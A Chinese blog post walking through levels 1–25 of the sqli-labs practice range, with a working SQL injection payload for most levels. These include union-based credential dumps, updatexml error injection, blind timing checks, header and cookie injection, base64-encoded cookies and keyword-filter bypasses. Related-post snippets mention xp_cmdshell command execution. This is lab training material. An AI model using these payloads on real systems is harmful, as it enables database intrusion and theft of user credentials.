sql注入练习之——sqli-labs 1-25

最新推荐文章于 2024-05-07 23:35:00 发布
最新推荐文章于 2024-05-07 23:35:00 发布
阅读量3k 收藏 1
点赞数 5
分类专栏: 渗透测试(web渗透)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wsnbbz/article/details/104252805
版权

第一关:
注入点:‘连接的字符串
在这里插入图片描述
数据脱库:
-1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3-- -
在这里插入图片描述
第二关:
注入点:数值型
在这里插入图片描述
数据脱库:
-1 union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–

在这里插入图片描述
第三关:
注入点:’)分割字符型
在这里插入图片描述
数据脱库:
?id=-1’) union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–
在这里插入图片描述
第四关:
注入点:")分割字符型
在这里插入图片描述
数据脱库:
?id=-1") union select 1,(select group_concat(concat_ws(0x7e,username,password))from users),3–
在这里插入图片描述
第五关:
注入点:单引号为边界的字符串错误注入
在这里插入图片描述
数据脱库:
?id=1’ and updatexml(1,concat(0x7e,(select substring(group_concat(schema_name) ,1,20)from information_schema.schemata)),1)-- -
在这里插入图片描述
第六关:
注入点:双引号为边界的字符串错误注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第七关:
注入点:’))为边界的字符串布尔注入
在这里插入图片描述
查看数据库长度:
?id=1’)) and (length(database()))=8-- -
在这里插入图片描述
第八关:
注入点:单引号为边界的字符串布尔注入
在这里插入图片描述
查看数据库长度:
?id=1’ and (length(database()))=8-- -
在这里插入图片描述
第九关:
注入点:’延时注入
在这里插入图片描述
查看数据库长度:
?id=2’ and if(length(database())=8,sleep(5),0)-- -
在这里插入图片描述
第十关:
注入点:双引号延时注入
在这里插入图片描述
查看数据库长度:
?id=2" and if(length(database())=8,sleep(5),0)-- -
在这里插入图片描述
第十一关:
注入点:单引号为边界的字符串union注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第十二关:
注入点:”)为边界的字符串union注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第十三关:
注入点:’)边界的字符串报错注入
在这里插入图片描述
数据脱库:
在这里插入图片描述
第十四关:
注入点:”边界的字符串报错注入
在这里插入图片描述
数据脱库:
在这里插入图片描述

第十五关:
注入点:单引号布尔
查看数据库长度:
在这里插入图片描述
第十六关:
注入点:双引号括号布尔
查看数据库长度:
在这里插入图片描述
第十七关:
注入点:基于单引号报错
数据脱库:
在这里插入图片描述
第十八关:
注入点:单引号http头部User-Agent注入
数据脱库:
1’ and updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,password)) ,1,20)from security.users)),1) and ‘1’=‘1
在这里插入图片描述
第十九关:
注入点:单引号http头部Referer注入
数据脱库:
在这里插入图片描述
第二十关:
注入点:单引号cookie
数据脱库:更改coolie后forward
Cookie: uname=admin’and updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,password)) ,1,20)from security.users)),1)-- -
在这里插入图片描述
第二十一关:
注入点:’)cookie加base64解码
数据脱库:
YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBzdWJzdHJpbmcoZ3JvdXBfY29uY2F0KGNvbmNhdF93cygweDdlLHVzZXJuYW1lLHBhc3N3b3JkKSkgLDEsMjApZnJvbSBzZWN1cml0eS51c2VycykpLDEpLS0gLQ==
在这里插入图片描述
第二十二关:
注入点:”cookie加base64解码(题显示还是21,实际是22)
数据脱库:
YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHN1YnN0cmluZyhncm91cF9jb25jYXQoY29uY2F0X3dzKDB4N2UsdXNlcm5hbWUscGFzc3dvcmQpKSAsMSwyMClmcm9tIHNlY3VyaXR5LnVzZXJzKSksMSktLSAt
在这里插入图片描述
第二十三关:
注入点:’过滤#、–、+
数据脱库:将注释改为’
?id=-1’ union select 1,(select group_concat(concat_ws(0x7e,username,password))from security.users),3’
在这里插入图片描述
第二十四关:
注入点:二次注入
数据脱库:注册一个admin-- -用户,修改密码时直接修改了admin的密码
在这里插入图片描述
第二十五关:
注入点:单引号报错,屏蔽or and
数据脱库:关键字套关键字
?id=-1’ anandd updatexml(1,concat(0x7e,(select substring(group_concat(concat_ws(0x7e,username,passwoorrd)) ,1,20)from security.users)),1)-- -
在这里插入图片描述
第二十五a关:
注入点:数值 屏蔽or and #
数据脱库:延时或联合
?id=-1 union select 1,(select group_concat(concat_ws(0x7e,username,passwoorrd))from security.users),3-- -
在这里插入图片描述

卖N孩的X火柴
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQL注入练习--sqli-labs
qq_46263951的博客
02-12 2702
前言 SQL注入是比较常见的漏洞,有数据库的地方就可能存在SQL注入,所以学好SQL注入是非常有必要的,sqli-labs是一个不错的练习靶场。推荐一篇文章SQL注入之Mysql注入姿势及绕过总结 前置知识 注入流程 判断是否存在注入,注入是字符型还是数字型,闭合情况,绕过方式 ?id=1' ?id=1" ?id=1') ?id=1") ?id=1' or 1# ?id=1' or 0# ?id=1' or 1=1# ?id=1' and 1=2# ?id=1' and sleep(5)# ?id=
sql注入---sqli靶场1-9
最新发布
weixin_72202802的博客
05-07 505
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQL注入——SQLi-Labs环境搭建
null1024的博客
08-16 587
前言 本篇文章主要简单介绍SQL注入漏洞以及练习平台SQLi-Labs环境搭建的步骤。 目录 一、关于SQL注入漏洞的介绍 二、关于SQLi-Labs的一些介绍 三、SQL-labs练习平台的环境搭建步骤 四、文章中提到的一些工具文件的分享 正文 一、关于SQL注入漏洞的介绍 SQL注入漏洞已经有十几年的历史,从最开始被发现到现在,它的危害与防范可以说是不断进行着。而SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL
SQL注入sqli-labs
m0_60716947的博客
04-08 7362
目录 (一)搭建 sqli-labs 靶场 (二)sqli-labs的第一关至第四关笔记 (1)第一关 sqli-labs 是一款基于 sql 注入的游戏教程,有利于更好地了解 sql 注入的语法。 (一)搭建 sqli-labs 靶场 搭建 sqli-labs 靶场前首先要下载 phpstudy phpstudy下载链接:https://www.xp.cn 要保证安装路径中不能有空格和中文。 下载完成后: 可以对 root 数据库进行修改密码或创建数据库,然后在软件管理..
SQL注入学习——sqli-labs闯关(Basic Challenges)
未完成的歌~的博客
07-28 2707
今天开始学习 SQL 注入的相关知识,通过 sqli-labs 靶场来练习。靶场地址SQL注入(SQL Injection)是一种常见的 Web 安全漏洞,攻击者通过构造SQL语句与后台数据库进行交互,达到获取或修改一些敏感数据,或者利用潜在的数据库漏洞进行攻击的目的。何为盲注?盲注就是在 sql 注入过程中,sql 语句执行后,查询的数据不能回显到前端页面上。此时,我们需要利用一些特殊的方法来得到数据,这个过程称之为盲注。盲注主要分为三类:基于布尔的 SQL 盲注基于时间的 SQL 盲注。........
SQL注入Sqli-labs注入环境搭建》
weixin_47118413的博客
04-06 8318
本文章讲解如何通过Linux(Centos 7)和Windows部署Sqli-labs环境进行sql注入漏洞相关练习,后期会更新关卡教程。
二次注入——sqli-labs第24关
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-02 3672
首先,选择注册 盲猜有个admin的账号,所以注册一个admin '#的账号。密码是12345 (上帝视角)此时admin的密码是admin 登录 然后为admin '#修改密码为123 修改成功(此时真的是修改admin '#的密码吗) (又一次上帝视角)此时admin的密码成了123,而admin '#的密码并没有重置 这就是二次注入: 原理就是php把…………………… sql……………… 至于为什么会有 ...
SQL注入分级通关(sqli-labs)
魔仙棒棒之主的博客
05-16 1058
SQL注入分级通关
sqli-labs练习——sql注入
haoaaao的博客
01-29 1465
/*** 环境搭建 CSDNhttps://mp.csdn.net/mp_blog/creation/editor/122668696 ***/ 一、less-1 (1)题目让提交一个参数,没说是get参数还是post参数,那先尝试一下get参数 (2)首先触发网站的异常,如果触发异常了,说明网站存在sql注入漏洞,甚至可以通过报错信息,获取数据库的一些信息。 1)可以通过特殊字符进行尝试 (空格、#号需要url转义) 报如下异常 ...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
2019OWASP漏洞top10
wsnbbz的博客
04-13 8113
A1 注入 Injection A2 失效的身份认证和会话管理 A3 跨站脚本-XSS A4 直接引用不安全的对象 Insecurity Direct Object Reference A5 安全配置错误 Security Misconfiguration A6 敏感信息泄露 Sensitive Data Exposure A7 缺少功能级访问控制 A8 跨站请求伪造 CSRF A9 使用含...
sql注入之——mssql(sqlserver)执行系统命令
wsnbbz的博客
02-12 5363
原理 利用xp_cmdshell扩展存储过程,此存储过程可以直接执行系统命令 开启xp_cmdshell扩展存储过程 ?id=1;use master;exec sp_configure ‘show advanced options’,1;reconfigure;exec sp_configure ‘xp_cmdshell’,1;reconfigure; 执行系统命令 ?id=1;use mas...
xss漏洞之——XSS平台搭建
wsnbbz的博客
03-04 4953
前言 经过测试,如果发现了XSS漏洞,那么我们可以结合一些XSS工具来进行利用。常见的XSS利用工具有下面几个: 1.kali下的beef (1)kali命令行里输入beef-xss,得到一个脚本 <script src="http://127.0.0.1:3000/hook.js"></script> 将127.0.0.1改为kali的ip,之后进行植入 (2)kali...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战练习。作者Lcamry在2016年编写了这份手册,旨在帮助读者理解和掌握SQL注入攻击与防御的相关知识。 ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值